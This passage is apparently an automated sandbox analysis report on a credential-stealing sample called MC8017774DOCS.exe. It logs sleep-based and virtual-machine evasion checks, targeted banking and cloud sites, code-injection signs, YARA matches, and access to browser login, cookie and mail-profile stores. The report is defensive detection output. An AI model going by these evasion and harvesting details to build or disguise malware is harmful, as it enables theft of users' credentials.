Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -595105s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -594946s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -594842s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -594625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -594515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -594406s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 0_2_004065DA FindFirstFileW,FindClose,	0_2_004065DA
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004059A9
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598952	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598389	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596358	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595105	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594946	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594842	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594515	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594406	Jump to behavior

Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: Vmwaretrat
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: vboxservice
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q#C:\windows\System32\vboxservice.exe
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: MC8017774DOCS.exe, 00000004.00000002.3453102350.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3453102350.0000000003D98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: Vmwareuser
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q&C:\windows\System32\Drivers\VBoxSF.sys
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q+C:\windows\System32\Drivers\VMToolsHook.dll
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q)C:\windows\System32\Drivers\VBoxGuest.sys
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q'C:\windows\System32\Drivers\Vmmouse.sys
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: vboxtrayOC:\windows\System32\Drivers\Vmmouse.sysMC:\windows\System32\Drivers\vm3dgl.dllMC:\windows\System32\Drivers\vmtray.dllWC:\windows\System32\Drivers\VMToolsHook.dllUC:\windows\System32\Drivers\vmmousever.dllSC:\windows\System32\Drivers\VBoxMouse.sysSC:\windows\System32\Drivers\VBoxGuest.sysMC:\windows\System32\Drivers\VBoxSF.sysSC:\windows\System32\Drivers\VBoxVideo.sysGC:\windows\System32\vboxservice.exe
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q*C:\windows\System32\Drivers\vmmousever.dll
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: Vmtoolsd
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q)C:\windows\System32\Drivers\VBoxMouse.sys
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	API call chain: ExitProcess graph end node

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Code function: 0_2_6E9B1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

Enables debug privileges

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Memory allocated: page read and write | page guard

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Process created: C:\Users\user\Desktop\MC8017774DOCS.exe "C:\Users\user\Desktop\MC8017774DOCS.exe"

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match

File source: 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
